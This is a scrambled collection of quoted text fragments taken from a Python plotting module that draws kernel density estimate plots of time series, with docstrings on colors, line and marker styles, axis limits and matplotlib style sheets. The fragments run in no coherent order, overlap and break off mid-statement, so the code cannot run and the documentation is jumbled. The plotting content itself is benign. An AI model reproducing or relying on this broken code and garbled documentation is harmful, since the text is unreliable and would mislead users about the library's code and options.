'steps' is equivalent", "| square | +-------+----------------+ | p | pentagon | +-------+----------------+", "the legend label the axis of the various time-series automatically.", "1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\",", "for index, line in enumerate(ax.lines): if icolors is not None:", "the type of the yaxis. One of 'arithmetic', 'log'. secondary_y", "lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead.", "legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\",", "\"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", #", "To not display lines use a space (' ') as", "--logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are", "+------+---------+ 3. Number between 0 and 1 that represents the", "where '--xlim ,1000' would base the lower limit on the", "If used within Python, and `ofilename` is None will return", "hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ):", "tsutils from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings)", "\"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is not None: if type", "\" if style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle)", "# \"retro\", # ], # ], # None, # ],", "to True] In case subplots=True, share x axis. sharey [optional,", "estimation of the probability density function based on the data", "x value for the entire plot. hlines_xmax: [optional, defaults to", "hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( #", "invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is", "'CN' where N is a number from 0 to 9", "# linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i", "work around some old option defaults with the implementation of", "= itertools.cycle(linestyles) # Only for bar, barh, bar_stacked, and barh_stacked.", "you to override the names in the data set. You", "be same length as `vlines_x`. 
If a single number is given, it will
Any of the HTML", "a single linestyle then will be used as the linestyle", "--lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\"", "bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles ==", "a red dashed line with star marker. bar_hatchstyles [optional, default", "# None, # ], # hlines_y=[float, [\"pass\", []], None], #", "\"\"\"Collection of functions for the manipulation of time series.\"\"\" from", "color for all vertical lines. If a list must be", "1. Use 'CN' where N is a number from 0", "and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units}", "norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por,", "hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot", "is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not", "@tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\",", "1,1000' would limit the plot from 1 to 1000, where", "share x axis. sharey [optional, default to False] In case", "None, # ], # ) def kde( input_ts=\"-\", columns=None, start_date=None,", "to last good value. Strips NANs from beginning and end.", "Set the style of the plot. One or more of", "as `hlines_y`. If a single number will be the maximum", "bar_hatchstyles == \"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles)", "{names} {source_units} {target_units} {round_index} plot_styles: str [optional, default is \"default\"]", "is None: hlines_xmin = nxlim[0] if hlines_xmax is None: hlines_xmax", "= tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim =", "previous. Color Blind Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\",", "must be same length as `hlines_y`. If None will take", "+-------+----------------+ | v | triangle down | +-------+----------------+ | ^", "# yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True,", "i in markerstyles] if colors is not None: icolors =", "False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[", "+-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+ | + |", "the yaxis. One of 'arithmetic', 'log'. secondary_y [optional, default is", "the secondary y-axis. If a list/tuple, which time-series to plot", "to override the names in the data set. You must", "i in [\" \", None] else i for i in", "= tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\"", "1], # plot_styles=[ # str, # [ # \"domain\", #", "if colors == \"auto\": colors = None else: colors =", "have {} time-series. 
\"\"\".format( style, len(nstyle), len(tsd.columns) ) ) )", "defaults to None] List of maximum x values to end", "# type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]],", "style which has {} style strings, but you have {}", "supplied '{}' for style which has {} style strings, but", "number from 0 to 9 that gets the Nth color", "in the chosen style. At the command line supply a", "[]], None], # vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str, [\"pass\",", "xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False,", "| < | triangle left | +-------+----------------+ | > |", "norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date}", "for black, white, and gray, however the \"ieee\" also will", "markerstyles is None: markerstyles = \" \" if style !=", "plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None: plt.savefig(ofilename)", "in nstyle: colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\")", "For --logy use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" *", "vlines_ymax: [optional, defaults to None] List of maximum x values", "\"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\",", "| +-------+----------------+ | ``*`` | star | +-------+----------------+ | h", "{} style strings, but you have {} time-series. \"\"\".format( style,", "None: vlines_ymin = nylim[0] if vlines_ymax is None: vlines_ymax =", "default is False] Whether to plot grid lines on the", "\"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx,", "the \"IEEE\" journal. The \"grayscale\" is another style useful for", "[True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], #", "the plot along the diagonal. One of 'kde' for Kernel", "plot along the diagonal. One of 'kde' for Kernel Density", "vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \" \",", "'] The default ' ' will not plot a marker.", "ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc", "horizontal | +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+ |", "and upper limits for the x-axis of the plot. For", "the lower limit on the data and set the upper", "xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\", []], 1], #", "in inches. legend [optional, defaults to True] Whether to display", "Code | Color | +======+=========+ | b | blue |", "# \"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\", # \"grayscale\",", "if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin =", "style of the plot. One or more of Matplotlib styles", "# grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float, [\"pass\", []],", "the plot. 
One or more of Matplotlib styles \"classic\", \"Solarize_Light2\",", "return the Matplotlib figure that can then be changed or", "* * The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and *", "normally use the time-series names associated with the input data.", "change the chart size to fit in a column of", "[]], 1], # type=[str, [\"domain\", [\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\",", "'auto'] The default 'auto' will cycle through matplotlib colors in", "using the Python API. To not display lines use a", "use '--yaxis=\"log\"' instead. xlim [optional, default is based on range", "= itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar, barh,", "\"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\", #", "[1, None]], 1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool,", "or more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\",", "API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+ | /", "plot. See `xlim` for examples. xaxis : str [optional, default", "limit on the data and set the upper limit to", "strings. Can identify colors in four different ways. 1. Use", "ofilename is not None: plt.savefig(ofilename) return plt kde.__doc__ = kde_cli.__doc__", "on the data and set the upper limit to 1000.", "based on range of y values] Comma separated lower and", "--lognorm_xaxis, and * --lognorm_yaxis options are deprecated. * * For", "the color pallette in the current plot style. hlines_linestyles: [optional,", "star | +-------+----------------+ | h | hexagon1 | +-------+----------------+ |", "target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None,", "Matplotlib figure that can then be changed or added to", "# \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\",", "on range of x values] Comma separated lower and upper", "+-------+----------------+ | s | square | +-------+----------------+ | p |", "``-`` | solid | +---------+--------------+ | -- | dashed |", "x-axis. ytitle : str [optional, default depends on ``type``] Title", "], # ) def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False,", "c | cyan | +------+---------+ | m | magenta |", "'auto' will iterate through the available matplotlib line types. Otherwise", "None]], 1], # drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\",", "plot style. vlines_linestyles: [optional, defaults to None] List of linestyles", "for bar plots. label_skip : int [optional] Skip for major", "[\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1],", "using the 'style' keyword. +---------+--------------+ | Code | Lines |", "a secondary_y axis, should the legend label the axis of", "1], # por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool, [\"domain\",", "for the manipulation of time series.\"\"\" from __future__ import absolute_import,", "If a list must be same length as `hlines_y`. If", "triangle left | +-------+----------------+ | > | triangle right |", "linestyles = [\" \"] else: linestyles = [\" \" if", "end each horizontal line. 
If a list is given, it must be the same
invert_yaxis [optional, default", "plotutils.LINE_LIST], # None, # ], # ) def kde( input_ts=\"-\",", "using the 'style' keyword. +-------+----------------+ | Code | Markers |", "None], # vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\",", "if vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax is", "= True if yaxis == \"log\": logy = True xlim", "'filename.png' will create a PNG file. If used within Python,", "plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\", None, \"\", \" \",", "else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles =", "plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and", "legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx,", "\".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i", "[\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax,", "\" \", \" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\",", "file. If used within Python, and `ofilename` is None will", "None: if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y))", "skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units,", "range of y values] Comma separated lower and upper limits", "# \"Solarize_Light2\", # \"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\",", "plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) +", "to None] List of colors for the horizontal lines. If", "draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default", "= plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles)", "Python API. Separated 'colors', 'linestyles', and 'markerstyles' instead of using", "None will take for the standard linestyles list. \"\"\" plt", "# \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\",", "List of linestyles for the vertical lines. If a single", "NANs from beginning and end. {force_freq} invert_xaxis [optional, default is", "to sort the values for the probability plots. Only used", "= \"\" if colors == \"auto\": colors = None else:", "plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type,", "None] List of linestyles for the vertical lines. If a", "cyan | +------+---------+ | m | magenta | +------+---------+ |", "list of strings if using the Python API. 
Separated 'colors',", "around some old option defaults with the implementation of #", "Color Names | +==================+ | red | +------------------+ | burlywood", "diagonal | +-----------------+-------------------+ | o | small circle | +-----------------+-------------------+", "[]], None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \",", "except AttributeError: short_freq = \"\" if colors == \"auto\": colors", "hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not", "number will be used as the minimum x values for", "that are setup to be able to be distinguished by", "value for the entire plot. vlines_ymax: [optional, defaults to None]", "the y-axis. plotting_position : str [optional, default is 'weibull'] {plotting_position_table}", "example, '--xlim 1,1000' would limit the plot from 1 to", "diamond | +-------+----------------+ | _ | hlines_y | +-------+----------------+ |", "the entire plot. hlines_colors: [optional, defaults to None] List of", "'--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default", "\"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\",", "+------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional,", "2], # legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\",", ") ) ) colors = [] markerstyles = [] linestyles", "None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for", "figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \",", "the maximum x value for the entire plot. vlines_colors: [optional,", "+-------+----------------+ | ' ' | nothing | +-------+----------------+ | ''", "[\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\", []], 1], #", "lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional, default", "plot on the secondary y-axis. If a list/tuple, which time-series", "\"] else: linestyles = [\" \" if i in [\"", "| nothing | +-------+----------------+ | '' | nothing | +-------+----------------+", "then will be used as the linestyle for all vertical", "chosen. xtitle : str [optional, default depends on ``type``] Title", "--type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use", "'plot.png'] Output filename for the plot. Extension defines the type,", "a number from 0 to 9 that gets the Nth", "have to have the same number of style strings as", "if imarkerstyles is not None: m = next(imarkerstyles) else: m", "is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax", "Invert the y-axis. plotting_position : str [optional, default is 'weibull']", "bar_hatchstyles | Description | +=================+===================+ | / | diagonal hatching", "[optional, defaults to ''] Title of chart. figsize : str", "case subplots=True, share y axis. 
colors [optional, default is 'auto']", "[\"domain\", [True, False]], 1], # colors=[str, [\"pass\", []], None], #", "| HTML Color Names | +==================+ | red | +------------------+", "tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin is None: hlines_xmin =", "= [\" \" if i in [\" \", None] else", "be the maximum x value for all horizontal lines. A", "| plus | +-------+----------------+ | x | x | +-------+----------------+", "# hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \"", "[optional, defaults to 50] The size of the random subset", "or \"Density\" if legend is True: plt.legend(loc=\"best\") if hlines_y is", "+------+---------+ | r | red | +------+---------+ | c |", "| dashed | +---------+--------------+ | -. | dash_dot | +---------+--------------+", "lines. If a list must be same length as `vlines_x`.", "mando legend = bool(legend == \"\" or legend == \"True\"", "limit to 1000. ylim [optional, default is based on range", "[\"pass\", []], 1], # por=[bool, [\"domain\", [True, False]], 1], #", "index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False,", "+---------+--------------+ | -. | dash_dot | +---------+--------------+ | : |", "example 'r*--' is a red dashed line with star marker.", "random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to 500]", "[\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\", []], 1], #", "= next(imarkerstyles) else: m = None if ilinestyles is not", "horizontal lines. A missing value or None will end at", "+------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If", "None], # hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []],", "for example 'r*--' is a red dashed line with star", "# \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\",", "# \"grid\", # \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\",", "\"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", # \"retro\", #", "Number or list of y values where to place a", "True if yaxis == \"log\": logy = True xlim =", "same length as `hlines_y`. If a single number will be", "as pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils", "that gets the Nth color from the current style. 2.", "+---------+--------------+ | ' ' | draw nothing | +---------+--------------+ |", "and 'markerstyles' instead of using the 'style' keyword. +-------+----------------+ |", "logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default is based", "3 | tri_left | +-------+----------------+ | 4 | tri_right |", "str [optional, defaults to 'kde'] If plot type is 'scatter_matrix',", "add a match line where x == y. Set to", "None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax)", "is black. 4. Any of the HTML color names. +------------------+", "the data and set the upper limit to 1000. ylim", "'auto' will iterate through the available matplotlib hatch types. Otherwise", "xlim=[float, [\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2], #", "\"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\",", "the type of the xaxis. One of 'arithmetic', 'log'. 
yaxis", "linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim,", "[ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\",", "tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors)", "\"vibrant\", \"muted\", and \"retro\". If multiple styles then each over", "and upper limits for the y-axis of the plot. See", "'arithmetic'] Defines the type of the xaxis. One of 'arithmetic',", "\"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\",", "* For --logx use --xaxis=\"log\" * For --logy use --yaxis=\"log\"", "| ' ' | nothing | +-------+----------------+ | '' |", "| -- | dashed | +---------+--------------+ | -. | dash_dot", "per time-series. Just combine codes in 'ColorMarkerLine' order, for example", "[\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1],", "For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" *", "[optional, defaults to None] List of colors for the vertical", "' will not plot a marker. If 'auto' will iterate", "secondary_y axis, should the legend label the axis of the", "default is 'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,", "\"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool,", "1], # sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str, [\"pass\",", "should the legend label the axis of the various time-series", "\"kde\" will create a plot of estimation of the probability", "| x | crossed diagonal | +-----------------+-------------------+ | o |", "style is appropriate for black, white, and gray, however the", "hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []], None], #", "subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False,", "None else i for i in markerstyles] if colors is", "| +---------+--------------+ | ' ' | draw nothing | +---------+--------------+", "will iterate through the available matplotlib line types. Otherwise on", "[\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], #", "\"\"\" ) if xaxis == \"log\": logx = True if", "| Color | +======+=========+ | b | blue | +------+---------+", "default is False] Invert the y-axis. plotting_position : str [optional,", "None will return the Matplotlib figure that can then be", "default is based on range of x values] Comma separated", "str, # [ # \"domain\", # [ # \"classic\", #", "default to 1] The lag used if ``type`` \"lag_plot\" is", "= ax.get_xlim() if hlines_xmin is None: hlines_xmin = nxlim[0] if", "minimum x values for all vertical lines. A missing value", "= str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3", "list. \"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean,", "subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED:", "If None will take for the standard linestyles list. 
\"\"\"", "+-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+ | o", "tsutils.make_list(colors) if linestyles == \"auto\": linestyles = plotutils.LINE_LIST else: linestyles", "m = next(imarkerstyles) else: m = None if ilinestyles is", "plot. For example, '--xlim 1,1000' would limit the plot from", "to plot on secondary y-axis. mark_right [optional, default is True]", "for all horizontal lines. A missing value or None will", "str [optional, defaults to ''] Title of chart. figsize :", "is chosen. xtitle : str [optional, default depends on ``type``]", "type of the xaxis. One of 'arithmetic', 'log'. yaxis :", "photo-copyable black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles:", "lines use a space (' ') as the linestyle code.", "| blue | +------+---------+ | g | green | +------+---------+", "\", None] else i for i in linestyles] markerstyles =", "and end. {force_freq} invert_xaxis [optional, default is False] Invert the", "xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None,", "str [optional, default is 'descending'] How to sort the values", "the upper limit to 1000. ylim [optional, default is based", "True or lognorm_xaxis is True or lognorm_yaxis is True ):", "others. Comma separated matplotlib style strings per time-series. Just combine", "The 'width,height' of plot in inches. legend [optional, defaults to", "= kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names,", "[\"range\", [0, None]], 1], # xy_match_line=[str, [\"pass\", []], 1], #", "# \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\",", "Extension defines the type, for example 'filename.png' will create a", "must be same length as `hlines_y`. If a single number", "\"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", #", "| triangle left | +-------+----------------+ | > | triangle right", "variants produce step-plots. 'steps' is equivalent to 'steps-pre' and is", "[\"range\", [0, None]], 2], # legend=[bool, [\"domain\", [True, False]], 1],", "plus | +-------+----------------+ | x | x | +-------+----------------+ |", "| +------------------+ | chartreuse | +------------------+ | ...etc. | +------------------+", "within Python a list of color code strings. Can identify", "default to 'auto'] If 'auto' will iterate through the available", "to a line style code. grid [optional, default is False]", "mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]],", "The default 'auto' will cycle through matplotlib colors in the", "if xaxis == \"log\": logx = True if yaxis ==", "import itertools import os import warnings import mando import numpy", "tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim,", "examples. xaxis : str [optional, default is 'arithmetic'] Defines the", "from the table below. +------+---------+ | Code | Color |", "if None is replaced by 'colors', 'linestyles', and 'markerstyles' options.", "[optional, default depends on ``type``] Title of x-axis. ytitle :", "current plot style. 
hlines_linestyles: [optional, defaults to None] List of", "color codes, or within Python a list of color code", "When using a secondary_y axis, should the legend label the", "available matplotlib marker types. Otherwise on the command line a", "the current plot style. hlines_linestyles: [optional, defaults to None] List", "same length as `hlines_y`. If None will take from the", "IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is", "os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i +", "except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles", "from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils from ..", "default is False] Whether to plot on the secondary y-axis.", "help pretty print the frequency try: try: pltfreq = str(tsd.index.freq,", "vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to work around", "chart. figsize : str [optional, defaults to '10,6.5'] The 'width,height'", "title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\"", "\"] + plotutils.LINE_LIST], # None, # ], # vlines_x=[float, [\"pass\",", "names. +------------------+ | HTML Color Names | +==================+ | red", "the minimum x value for the entire plot. vlines_ymax: [optional,", "[\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1],", "if ilinestyles is not None: l = next(ilinestyles) else: l", "columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\",", "[\"pass\", []], 1], # label_skip=[int, [\"range\", [1, None]], 1], #", "bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip,", ": str [optional, default depends on ``type``] Title of y-axis.", "round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax,", "One of 'arithmetic', 'log'. secondary_y [optional, default is False] Whether", "x values to end each horizontal line. If a list", "is 'descending'] How to sort the values for the probability", "plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if", "defaults to 50] The size of the random subset for", "is True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title)", "separated matplotlib style strings per time-series. Just combine codes in", "One or more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\",", "vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability", "plot. Extension defines the type, for example 'filename.png' will create", "linestyle then will be used as the linestyle for all", "display the legend. 
